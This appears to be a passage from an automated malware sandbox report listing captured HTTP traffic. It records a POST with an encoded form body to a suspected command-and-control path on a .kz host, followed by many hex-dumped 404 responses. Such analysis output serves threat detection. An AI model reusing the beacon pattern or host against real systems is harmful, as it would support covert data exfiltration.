            Source: unknownHTTP traffic detected: POST /wu8v/ HTTP/1.1Host: www.auetravel.kzAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.auetravel.kzCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 204Connection: closeReferer: http://www.auetravel.kz/wu8v/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 4d 64 74 6c 63 54 6d 3d 6c 32 31 70 77 5a 38 38 47 44 33 75 49 31 5a 51 63 71 50 4d 49 4a 6c 72 65 34 57 76 75 75 33 71 6b 4c 33 76 75 33 33 2f 2b 61 56 41 43 42 38 52 71 37 5a 6b 42 56 74 4d 31 46 48 57 75 2b 74 52 76 36 30 66 46 47 79 6b 64 6f 4e 78 52 4f 47 69 41 6d 69 51 2b 35 58 68 4d 69 37 37 73 34 71 64 66 72 74 4a 48 69 6d 72 42 46 57 4d 77 41 38 35 50 4d 56 35 76 7a 6d 4a 32 57 79 36 6d 69 73 42 73 67 6e 63 34 75 4e 6a 30 79 41 42 6e 54 45 37 6f 6c 76 70 73 36 6b 61 4d 2b 39 37 73 47 79 74 79 49 34 6a 52 4e 51 39 79 77 2f 72 4a 4c 51 70 70 2f 73 54 4a 41 56 51 30 2f 56 37 70 56 6c 38 71 41 3d 3d Data Ascii: MdtlcTm=l21pwZ88GD3uI1ZQcqPMIJlre4Wvuu3qkL3vu33/+aVACB8Rq7ZkBVtM1FHWu+tRv60fFGykdoNxROGiAmiQ+5XhMi77s4qdfrtJHimrBFWMwA85PMV5vzmJ2Wy6misBsgnc4uNj0yABnTE7olvps6kaM+97sGytyI4jRNQ9yw/rJLQpp/sTJAVQ0/V7pVl8qA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 12:05:23 GMTServer: ApacheX-SERVER: 3908Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 75 38 76 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wu8v/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 08 May 2024 12:05:56 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 08 May 2024 12:06:00 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 08 May 2024 12:06:03 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 08 May 2024 12:06:05 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:06:14 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: brData Raw: 38 66 0d 0a a1 18 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 74 b3 81 0d 70 38 8c e7 3c 7c ae 4d 8a b1 2b e9 23 92 66 62 94 5d 6a 81 70 41 5a e9 a1 67 c0 a8 71 7b 56 69 d3 a5 0c 31 7d 73 14 43 d3 56 5c 79 30 3f d7 8b 6c 17 21 bc 41 60 04 c4 f7 0f 3a cc b7 68 b1 45 38 e3 2e e6 27 9e 1b 2b ef 8d 1b 2b 13 e2 43 2e 7b 1d e2 6a 7c 9e e0 6a 29 ff fe 8d db fd 03 d9 8a 5f 2f 90 17 94 48 3f b0 81 6a 22 cd 86 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 8f [(slytEa$tp8<|M+#fb]jpAZgq{Vi1}sCV\y0?l!A`:hE8.'++C.{j|j)_/H?j"0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:06:17 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: brData Raw: 38 66 0d 0a a1 18 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 74 b3 81 0d 70 38 8c e7 3c 7c ae 4d 8a b1 2b e9 23 92 66 62 94 5d 6a 81 70 41 5a e9 a1 67 c0 a8 71 7b 56 69 d3 a5 0c 31 7d 73 14 43 d3 56 5c 79 30 3f d7 8b 6c 17 21 bc 41 60 04 c4 f7 0f 3a cc b7 68 b1 45 38 e3 2e e6 27 9e 1b 2b ef 8d 1b 2b 13 e2 43 2e 7b 1d e2 6a 7c 9e e0 6a 29 ff fe 8d db fd 03 d9 8a 5f 2f 90 17 94 48 3f b0 81 6a 22 cd 86 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 8f [(slytEa$tp8<|M+#fb]jpAZgq{Vi1}sCV\y0?l!A`:hE8.'++C.{j|j)_/H?j"0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:06:21 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: brData Raw: 38 66 0d 0a a1 18 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 74 b3 81 0d 70 38 8c e7 3c 7c ae 4d 8a b1 2b e9 23 92 66 62 94 5d 6a 81 70 41 5a e9 a1 67 c0 a8 71 7b 56 69 d3 a5 0c 31 7d 73 14 43 d3 56 5c 79 30 3f d7 8b 6c 17 21 bc 41 60 04 c4 f7 0f 3a cc b7 68 b1 45 38 e3 2e e6 27 9e 1b 2b ef 8d 1b 2b 13 e2 43 2e 7b 1d e2 6a 7c 9e e0 6a 29 ff fe 8d db fd 03 d9 8a 5f 2f 90 17 94 48 3f b0 81 6a 22 cd 86 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 8f [(slytEa$tp8<|M+#fb]jpAZgq{Vi1}sCV\y0?l!A`:hE8.'++C.{j|j)_/H?j"0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:06:24 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 12:06:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
